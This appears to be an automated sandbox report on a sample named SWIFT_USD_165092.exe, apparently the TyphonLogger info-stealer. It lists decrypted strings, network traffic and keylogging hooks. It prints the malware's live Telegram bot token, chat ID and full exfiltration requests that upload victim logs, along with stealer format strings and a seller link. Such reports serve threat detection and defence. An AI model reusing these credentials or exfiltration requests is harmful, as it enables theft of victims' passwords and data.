                    Source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpackString decryptor: Type: {0}Number: {1}Expiry: {2}Holder: {3}Stolen by: TyphonLogger V1
                    Source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpackString decryptor: /
                    Source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpackString decryptor: URL: {0}Username: {1}Password: {2}Browser: {3}Stolen by: TyphonLogger V1==========================
                    Source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpackString decryptor: .compressed
                    Source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpackString decryptor: bouncycastle.crypto
                    Source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpackString decryptor: costura.bouncycastle.crypto.dll.compressed
                    Source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpackString decryptor: costura
                    Source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpackString decryptor: costura.costura.dll.compressed
                    Source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpackString decryptor: costura.costura.pdb.compressed
                    Source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpackString decryptor: dotnetzip
                    Source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpackString decryptor: costura.dotnetzip.dll.compressed
                    Source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpackString decryptor: costura.dotnetzip.pdb.compressed
                    Source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpackString decryptor: system.runtime.interopservices.runtimeinformation
                    Source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpackString decryptor: costura.system.runtime.interopservices.runtimeinformation.dll.compressed
                    Source: SWIFT_USD_165092.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                    Source: unknownHTTPS traffic detected: 172.67.69.226:443 -> 192.168.2.5:49716 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49718 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 172.67.69.226:443 -> 192.168.2.5:49725 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49726 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49727 version: TLS 1.2
                    Source: C:\Users\user\Desktop\SWIFT_USD_165092.exeFile created: C:\Users\user\AppData\Local\Logs\22-05-2023\Installed Software.txtJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost\svchost.exeFile created: C:\Users\user\AppData\Local\Logs\22-05-2023\Installed Software.txtJump to behavior
                    Source: SWIFT_USD_165092.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                    Source: Binary string: mscorlib.pdbMZ source: WER14F4.tmp.dmp.37.dr
                    Source: Binary string: System.Core.ni.pdbRSDSD source: WER14F4.tmp.dmp.37.dr
                    Source: Binary string: System.Xml.ni.pdb source: WER14F4.tmp.dmp.37.dr
                    Source: Binary string: Accessibility.pdb source: WER14F4.tmp.dmp.37.dr
                    Source: Binary string: System.Windows.Forms.pdbSystem.Net.Http.dllXs source: WER14F4.tmp.dmp.37.dr
                    Source: Binary string: System.ni.pdbRSDS source: WER14F4.tmp.dmp.37.dr
                    Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_32\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb.0 source: SWIFT_USD_165092.exe, 00000001.00000002.521846828.0000000000B04000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: costura.costura.pdb.compressed source: SWIFT_USD_165092.exe, 00000001.00000002.524320725.0000000002841000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.651681057.0000000002E91000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000028.00000002.650586670.0000000003241000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: System.Configuration.ni.pdb source: WER14F4.tmp.dmp.37.dr
                    Source: Binary string: System.Net.Http.pdbmscorlib.ni.dllp source: WER14F4.tmp.dmp.37.dr
                    Source: Binary string: System.Net.Http.pdb source: WER14F4.tmp.dmp.37.dr
                    Source: Binary string: C:\projects\dotnetzip-semverd\src\Zip\obj\Release\DotNetZip.pdb source: SWIFT_USD_165092.exe, 00000001.00000002.533583456.0000000003B06000.00000004.00000800.00020000.00000000.sdmp, SWIFT_USD_165092.exe, 00000001.00000002.548491096.0000000006AC0000.00000004.08000000.00040000.00000000.sdmp, SWIFT_USD_165092.exe, 00000001.00000002.533583456.00000000039C2000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.662208925.0000000004155000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: mscorlib.ni.pdbRSDS source: WER14F4.tmp.dmp.37.dr
                    Source: Binary string: mscorlib.pdb853321935-2125563209-4053062332-1002_Classes\WOW6432Node\CLSID\{0A29FF9E-7F9C-4437-8B11-F424491E3931}\Servererver327 source: SWIFT_USD_165092.exe, 00000001.00000002.521846828.0000000000AD9000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: System.Configuration.pdb source: WER14F4.tmp.dmp.37.dr
                    Source: Binary string: System.Xml.pdb source: WER14F4.tmp.dmp.37.dr
                    Source: Binary string: System.pdb source: WER14F4.tmp.dmp.37.dr
                    Source: Binary string: C:\Windows\mscorlib.pdbpdblib.pdbO source: SWIFT_USD_165092.exe, 00000001.00000002.548199153.000000000623B000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: System.Core.ni.pdb source: WER14F4.tmp.dmp.37.dr
                    Source: Binary string: Microsoft.VisualBasic.pdb source: WER14F4.tmp.dmp.37.dr
                    Source: Binary string: System.Windows.Forms.pdb source: WER14F4.tmp.dmp.37.dr
                    Source: Binary string: mscorlib.pdb source: SWIFT_USD_165092.exe, 00000001.00000002.521846828.0000000000AE5000.00000004.00000020.00020000.00000000.sdmp, WER14F4.tmp.dmp.37.dr
                    Source: Binary string: \??\C:\Windows\symbols\dll\mscorlib.pdb source: SWIFT_USD_165092.exe, 00000001.00000002.547387044.000000000619A000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: System.Net.Http.ni.pdb source: WER14F4.tmp.dmp.37.dr
                    Source: Binary string: System.Management.pdb source: WER14F4.tmp.dmp.37.dr
                    Source: Binary string: System.Drawing.pdb source: WER14F4.tmp.dmp.37.dr
                    Source: Binary string: mscorlib.ni.pdb source: WER14F4.tmp.dmp.37.dr
                    Source: Binary string: System.pdb3 source: WER14F4.tmp.dmp.37.dr
                    Source: Binary string: \??\C:\Windows\mscorlib.pdb source: SWIFT_USD_165092.exe, 00000001.00000003.506792457.00000000061F3000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: q costura.dotnetzip.pdb.compressed source: SWIFT_USD_165092.exe, 00000001.00000002.524320725.0000000002841000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.651681057.0000000002E91000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000028.00000002.650586670.0000000003241000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: System.Core.pdb source: WER14F4.tmp.dmp.37.dr
                    Source: Binary string: DotNetZip.pdb source: WER14F4.tmp.dmp.37.dr
                    Source: Binary string: System.Configuration.ni.pdbRSDSO* source: WER14F4.tmp.dmp.37.dr
                    Source: Binary string: System.Xml.ni.pdbRSDS source: WER14F4.tmp.dmp.37.dr
                    Source: Binary string: \??\C:\Windows\dll\mscorlib.pdbM source: SWIFT_USD_165092.exe, 00000001.00000002.521846828.0000000000B19000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: System.Net.Http.ni.pdbRSDS source: WER14F4.tmp.dmp.37.dr
                    Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_32\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb6 source: SWIFT_USD_165092.exe, 00000001.00000002.521846828.0000000000B04000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: System.ni.pdb source: WER14F4.tmp.dmp.37.dr

                    Networking

                    barindex
                    System process connects to network (likely due to code injection or exploit)
                    Source: C:\Users\user\AppData\Roaming\svchost\svchost.exeDomain query: 245.246.1.0.in-addr.arpa
                    Source: C:\Users\user\AppData\Roaming\svchost\svchost.exeNetwork Connect: 149.154.167.220 443Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost\svchost.exeDomain query: ipapi.co
                    Source: C:\Users\user\AppData\Roaming\svchost\svchost.exeDomain query: api.ipify.org
                    Source: C:\Users\user\AppData\Roaming\svchost\svchost.exeDomain query: api.telegram.org
                    Source: C:\Users\user\AppData\Roaming\svchost\svchost.exeNetwork Connect: 173.231.16.76 80Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost\svchost.exeNetwork Connect: 172.67.69.226 443Jump to behavior
                    Uses the Telegram API (likely for C&C communication)
                    Source: unknownDNS query: name: api.telegram.org
                    Source: unknownDNS query: name: api.telegram.org
                    May check the online IP address of the machine
                    Source: C:\Users\user\Desktop\SWIFT_USD_165092.exeDNS query: name: api.ipify.org
                    Source: C:\Users\user\Desktop\SWIFT_USD_165092.exeDNS query: name: api.ipify.org
                    Source: C:\Users\user\Desktop\SWIFT_USD_165092.exeDNS query: name: api.ipify.org
                    Source: C:\Users\user\Desktop\SWIFT_USD_165092.exeDNS query: name: api.ipify.org
                    Source: C:\Users\user\Desktop\SWIFT_USD_165092.exeDNS query: name: api.ipify.org
                    Source: C:\Users\user\Desktop\SWIFT_USD_165092.exeDNS query: name: api.ipify.org
                    Source: C:\Users\user\AppData\Roaming\svchost\svchost.exeDNS query: name: api.ipify.org
                    Source: C:\Users\user\AppData\Roaming\svchost\svchost.exeDNS query: name: api.ipify.org
                    Source: C:\Users\user\AppData\Roaming\svchost\svchost.exeDNS query: name: api.ipify.org
                    Source: C:\Users\user\AppData\Roaming\svchost\svchost.exeDNS query: name: api.ipify.org
                    Source: C:\Users\user\AppData\Roaming\svchost\svchost.exeDNS query: name: api.ipify.org
                    Source: C:\Users\user\AppData\Roaming\svchost\svchost.exeDNS query: name: api.ipify.org
                    Yara detected Generic Downloader
                    Source: Yara matchFile source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 1.2.SWIFT_USD_165092.exe.720000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.SWIFT_USD_165092.exe.3e61140.0.raw.unpack, type: UNPACKEDPE
                    C2 URLs / IPs found in malware configuration
                    Source: Malware configuration extractorURLs: https://api.telegram.org/bot5869127049:AAE4vUitXNuHH_zpHPpNqKI8kJlNJ2I0Hss/sendMessage?chat_id=1689002171
                    Source: global trafficHTTP traffic detected: GET /bot5869127049:AAE4vUitXNuHH_zpHPpNqKI8kJlNJ2I0Hss/sendMessage?chat_id=1689002171&text=New%20TyphonLogger%20log!%0A---------------------%0AUsername:%20user%0AMachine%20name:%20128757%0AHWID:%201B269386E0%0AIP%20address:%2084.17.52.45%0A---------------------%0ABuild%20Tag:%20%0A---------------------%0AYour%20logs%20are%20in%20the%20ZIP%20file%20being%20uploaded.%0AThank%20you%20for%20using%20TyphonLogger!%0Ahttps://t.me/typhon_shop HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: POST /bot5869127049:AAE4vUitXNuHH_zpHPpNqKI8kJlNJ2I0Hss/sendDocument?chat_id=1689002171 HTTP/1.1Content-Type: multipart/form-data; boundary="0c552aff-97a1-416c-92c5-e86524fa2be5"Host: api.telegram.orgContent-Length: 778795Expect: 100-continue
                    Source: global trafficHTTP traffic detected: GET /bot5869127049:AAE4vUitXNuHH_zpHPpNqKI8kJlNJ2I0Hss/sendMessage?chat_id=1689002171&text=New%20TyphonLogger%20log!%0A---------------------%0AUsername:%20user%0AMachine%20name:%20128757%0AHWID:%201B269386E0%0AIP%20address:%2084.17.52.45%0A---------------------%0ABuild%20Tag:%20%0A---------------------%0AYour%20logs%20are%20in%20the%20ZIP%20file%20being%20uploaded.%0AThank%20you%20for%20using%20TyphonLogger!%0Ahttps://t.me/typhon_shop HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: POST /bot5869127049:AAE4vUitXNuHH_zpHPpNqKI8kJlNJ2I0Hss/sendDocument?chat_id=1689002171 HTTP/1.1Content-Type: multipart/form-data; boundary="65055caf-f467-42d1-9569-ad240200e71b"Host: api.telegram.orgContent-Length: 554301Expect: 100-continue
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: api.ipify.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: api.ipify.org
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: api.ipify.org
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: api.ipify.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: api.ipify.org
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: api.ipify.org
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49726 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49727 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49725 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49719 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49719
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49718
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49716 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49716
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49727
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49726
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49725
                    Source: SWIFT_USD_165092.exe, 00000001.00000002.524320725.0000000002841000.00000004.00000800.00020000.00000000.sdmp, SWIFT_USD_165092.exe, 00000001.00000002.524320725.0000000002DCE000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.651681057.0000000002E91000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.651681057.000000000332E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://api.ipify.org
                    Source: SWIFT_USD_165092.exe, 00000001.00000002.524320725.0000000002841000.00000004.00000800.00020000.00000000.sdmp, SWIFT_USD_165092.exe, 00000001.00000002.524320725.0000000002DCE000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.651681057.0000000002E91000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.651681057.000000000332E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://api.ipify.org/
                    Source: SWIFT_USD_165092.exe, 00000001.00000002.524320725.0000000002841000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.651681057.0000000002E91000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://api.ipify.org4Dp
                    Source: SWIFT_USD_165092.exe, 00000001.00000002.524320725.0000000002DCE000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.651681057.000000000332E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://api.ipify.orgD8Dp
                    Source: SWIFT_USD_165092.exe, 00000001.00000002.524320725.0000000002DD8000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.651681057.0000000003356000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://api.telegram.org
                    Source: SWIFT_USD_165092.exe, 00000001.00000002.521846828.0000000000B04000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.650106846.0000000000EE2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
                    Source: SWIFT_USD_165092.exe, 00000001.00000002.524320725.0000000002841000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.651681057.0000000002E91000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                    Source: Amcache.hve.37.drString found in binary or memory: http://upx.sf.net
                    Source: svchost.exe, 0000000E.00000002.662208925.0000000004155000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.codeplex.com/DotNetZip
                    Source: b7fbbbd0-cab3-4baf-a44e-1add614b7f64.1.drString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                    Source: SWIFT_USD_165092.exe, 00000001.00000002.524320725.0000000002DD8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram
                    Source: SWIFT_USD_165092.exe, 00000001.00000002.524320725.0000000002DDC000.00000004.00000800.00020000.00000000.sdmp, SWIFT_USD_165092.exe, 00000001.00000002.524320725.0000000002DD8000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.651681057.000000000335A000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.651681057.0000000003356000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org
                    Source: SWIFT_USD_165092.exe, 00000001.00000002.524320725.00000000028A9000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.651681057.0000000002EF9000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.651681057.000000000311D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot
                    Source: SWIFT_USD_165092.exe, 00000001.00000002.524320725.0000000002DDC000.00000004.00000800.00020000.00000000.sdmp, SWIFT_USD_165092.exe, 00000001.00000002.524320725.00000000028A9000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.651681057.000000000335A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot5869127049:AAE4vUitXNuHH_zpHPpNqKI8kJlNJ2I0Hss/sendDocument?chat_id=1689
                    Source: SWIFT_USD_165092.exe, 00000001.00000002.524320725.00000000028A9000.00000004.00000800.00020000.00000000.sdmp, SWIFT_USD_165092.exe, 00000001.00000002.524320725.0000000002DD2000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.651681057.0000000003341000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.651681057.0000000003354000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.651681057.0000000003356000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot5869127049:AAE4vUitXNuHH_zpHPpNqKI8kJlNJ2I0Hss/sendMessage?chat_id=16890
                    Source: SWIFT_USD_165092.exe, 00000001.00000002.524320725.00000000028A9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org4Dp
                    Source: svchost.exe, 0000000E.00000002.651681057.0000000003356000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org4Dp(
                    Source: b7fbbbd0-cab3-4baf-a44e-1add614b7f64.1.drString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                    Source: b7fbbbd0-cab3-4baf-a44e-1add614b7f64.1.drString found in binary or memory: https://duckduckgo.com/ac/?q=
                    Source: SWIFT_USD_165092.exe, 00000001.00000003.481034503.000000000624E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.589310813.00000000055C8000.00000004.00000020.00020000.00000000.sdmp, 2956d154-79a0-458c-9507-f5de6e62dd96.1.dr, acf092cf-e9ca-4ee8-8b91-35872d9c173c.14.dr, b65d24f6-721c-4e3e-aed6-0778bb2b440a.14.dr, b7fbbbd0-cab3-4baf-a44e-1add614b7f64.1.drString found in binary or memory: https://duckduckgo.com/chrome_newtab
                    Source: b7fbbbd0-cab3-4baf-a44e-1add614b7f64.1.drString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                    Source: SWIFT_USD_165092.exe, 00000001.00000002.524320725.000000000287B000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.651681057.0000000002ECB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ipapi.co/84.17.52.45/json
                    Source: SWIFT_USD_165092.exe, 00000001.00000002.524320725.000000000287B000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.651681057.0000000002ECB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ipapi.co4Dp
                    Source: SWIFT_USD_165092.exe, 00000001.00000003.479687735.00000000061C9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://java.sun.com
                    Source: SWIFT_USD_165092.exe, 00000001.00000003.481034503.000000000624E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.589310813.00000000055C8000.00000004.00000020.00020000.00000000.sdmp, 2956d154-79a0-458c-9507-f5de6e62dd96.1.dr, acf092cf-e9ca-4ee8-8b91-35872d9c173c.14.dr, b65d24f6-721c-4e3e-aed6-0778bb2b440a.14.dr, b7fbbbd0-cab3-4baf-a44e-1add614b7f64.1.drString found in binary or memory: https://search.yahoo.com/favicon.icohttps://search.yahoo.com/search
                    Source: SWIFT_USD_165092.exe, 00000001.00000003.481034503.000000000624E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.589310813.00000000055C8000.00000004.00000020.00020000.00000000.sdmp, 2956d154-79a0-458c-9507-f5de6e62dd96.1.dr, acf092cf-e9ca-4ee8-8b91-35872d9c173c.14.dr, b65d24f6-721c-4e3e-aed6-0778bb2b440a.14.dr, b7fbbbd0-cab3-4baf-a44e-1add614b7f64.1.drString found in binary or memory: https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas_sfp&command=
                    Source: SWIFT_USD_165092.exe, 00000001.00000003.481034503.000000000624E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.589310813.00000000055C8000.00000004.00000020.00020000.00000000.sdmp, 2956d154-79a0-458c-9507-f5de6e62dd96.1.dr, acf092cf-e9ca-4ee8-8b91-35872d9c173c.14.dr, b65d24f6-721c-4e3e-aed6-0778bb2b440a.14.dr, b7fbbbd0-cab3-4baf-a44e-1add614b7f64.1.drString found in binary or memory: https://search.yahoo.com?fr=crmas_sfp
                    Source: SWIFT_USD_165092.exe, 00000001.00000003.481034503.000000000624E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.589310813.00000000055C8000.00000004.00000020.00020000.00000000.sdmp, 2956d154-79a0-458c-9507-f5de6e62dd96.1.dr, acf092cf-e9ca-4ee8-8b91-35872d9c173c.14.dr, b65d24f6-721c-4e3e-aed6-0778bb2b440a.14.dr, b7fbbbd0-cab3-4baf-a44e-1add614b7f64.1.drString found in binary or memory: https://search.yahoo.com?fr=crmas_sfpf
                    Source: SWIFT_USD_165092.exe, svchost.exe.9.drString found in binary or memory: https://subf.domfagdfa6ffaffiffn.comd/objecsts.json?api_key=123R
                    Source: SWIFT_USD_165092.exe, 00000001.00000002.524320725.0000000002DD2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://t.me/typho
                    Source: svchost.exe, 0000000E.00000002.651681057.0000000003356000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://t.me/typhon_shop
                    Source: SWIFT_USD_165092.exe, 00000001.00000002.533583456.0000000003B06000.00000004.00000800.00020000.00000000.sdmp, SWIFT_USD_165092.exe, 00000001.00000002.524320725.0000000002DB9000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.662208925.0000000004012000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.651681057.0000000002F49000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.651681057.0000000002EF9000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.651681057.000000000332E000.00000004.00000800.00020000.00000000.sdmp, DotNetZip-cmmx3b12.tmp.1.dr, DotNetZip-dd5sgyyl.tmp.14.drString found in binary or memory: https://t.me/typhon_shop.
                    Source: SWIFT_USD_165092.exe, 00000001.00000002.524320725.0000000002DDC000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.651681057.000000000335A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://t.me/typhon_shopD8Dp
                    Source: SWIFT_USD_165092.exe, 00000001.00000003.481034503.000000000624E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.589310813.00000000055C8000.00000004.00000020.00020000.00000000.sdmp, 2956d154-79a0-458c-9507-f5de6e62dd96.1.dr, acf092cf-e9ca-4ee8-8b91-35872d9c173c.14.dr, b65d24f6-721c-4e3e-aed6-0778bb2b440a.14.dr, b7fbbbd0-cab3-4baf-a44e-1add614b7f64.1.drString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
                    Source: unknownHTTP traffic detected: POST /bot5869127049:AAE4vUitXNuHH_zpHPpNqKI8kJlNJ2I0Hss/sendDocument?chat_id=1689002171 HTTP/1.1Content-Type: multipart/form-data; boundary="0c552aff-97a1-416c-92c5-e86524fa2be5"Host: api.telegram.orgContent-Length: 778795Expect: 100-continue
                    Source: unknownDNS traffic detected: queries for: api.ipify.org
                    Source: global trafficHTTP traffic detected: GET /84.17.52.45/json HTTP/1.1User-Agent: ipapi.co /#c-sharp-v1.03Host: ipapi.coConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /bot5869127049:AAE4vUitXNuHH_zpHPpNqKI8kJlNJ2I0Hss/sendMessage?chat_id=1689002171&text=New%20TyphonLogger%20log!%0A---------------------%0AUsername:%20user%0AMachine%20name:%20128757%0AHWID:%201B269386E0%0AIP%20address:%2084.17.52.45%0A---------------------%0ABuild%20Tag:%20%0A---------------------%0AYour%20logs%20are%20in%20the%20ZIP%20file%20being%20uploaded.%0AThank%20you%20for%20using%20TyphonLogger!%0Ahttps://t.me/typhon_shop HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /84.17.52.45/json HTTP/1.1User-Agent: ipapi.co /#c-sharp-v1.03Host: ipapi.coConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /bot5869127049:AAE4vUitXNuHH_zpHPpNqKI8kJlNJ2I0Hss/sendMessage?chat_id=1689002171&text=New%20TyphonLogger%20log!%0A---------------------%0AUsername:%20user%0AMachine%20name:%20128757%0AHWID:%201B269386E0%0AIP%20address:%2084.17.52.45%0A---------------------%0ABuild%20Tag:%20%0A---------------------%0AYour%20logs%20are%20in%20the%20ZIP%20file%20being%20uploaded.%0AThank%20you%20for%20using%20TyphonLogger!%0Ahttps://t.me/typhon_shop HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: api.ipify.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: api.ipify.org
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: api.ipify.org
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: api.ipify.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: api.ipify.org
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: api.ipify.org
                    Source: unknownHTTPS traffic detected: 172.67.69.226:443 -> 192.168.2.5:49716 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49718 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 172.67.69.226:443 -> 192.168.2.5:49725 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49726 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49727 version: TLS 1.2

                    Key, Mouse, Clipboard, Microphone and Screen Capturing

                    barindex
                    Contains functionality to log keystrokes (.Net Source)
                    Source: 1.2.SWIFT_USD_165092.exe.720000.0.unpack, Log/Modules/Keylogger/MainModule.cs.Net Code: SetHook
                    Source: 1.2.SWIFT_USD_165092.exe.720000.0.unpack, Log/Modules/Keylogger/MainModule.cs.Net Code: KeyboardLayout
                    Contains functionality to register a low level keyboard hook
                    Source: C:\Users\user\AppData\Roaming\svchost\svchost.exeCode function: 14_2_053BB690 SetWindowsHookExW 0000000D,00000000,?,?14_2_053BB690
                    Source: SWIFT_USD_165092.exe, 00000000.00000002.398773484.0000000000FE0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

                    System Summary

                    barindex
                    Malicious sample detected (through community Yara rule)
                    Source: 0.2.SWIFT_USD_165092.exe.4068d70.1.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing many base64-encoded IR and analysis tools names Author: ditekSHen
                    Source: 0.2.SWIFT_USD_165092.exe.3e61140.0.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing many base64-encoded IR and analysis tools names Author: ditekSHen
                    Source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing many base64-encoded IR and analysis tools names Author: ditekSHen
                    Source: 1.2.SWIFT_USD_165092.exe.720000.0.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing many base64-encoded IR and analysis tools names Author: ditekSHen
